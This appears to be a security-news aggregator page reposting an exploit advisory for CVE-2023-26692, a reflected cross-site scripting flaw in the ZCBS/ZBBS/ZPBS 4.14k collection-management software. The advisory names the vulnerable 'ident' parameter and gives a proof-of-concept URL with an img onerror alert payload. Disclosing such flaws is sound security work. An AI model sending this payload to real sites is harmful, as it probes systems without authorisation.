Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-26692: GitHub - bigzooooz/CVE-2023-26692: ZCBS/ZBBS/ZPBS v4.14k - Reflected XSS

ZCBS Zijper Collectie Beheer Systeem (ZCBS), Zijper Publication Management System (ZPBS), and Zijper Image Bank Management System (ZBBS) 4.14k is vulnerable to Cross Site Scripting (XSS).

CVE
#xss#vulnerability#ubuntu#git#auth

CVE-2023-26692

ZCBS/ZCBS/ZPBS/ZBBS Reflected XSS

Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected XSS****Date: 2023-03-30****CVE: CVE-2023-26692****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://www.zcbs.nl****Software Link: https://www.zcbs.nl/cgi-bin/objecten.pl****Version: 4.14k****Tested on: LAMP, Ubuntu

[#] Vulnerability : $_GET[‘ident’]

[#] Exploitation : https://localhost/cgi-bin/objecten.pl?ident=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E

Related news

ZCBS / ZBBS / ZPBS 4.14k Cross Site Scripting

ZCBS, ZBBS, and ZPBS version 4.14k suffer from a cross site scripting vulnerability.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907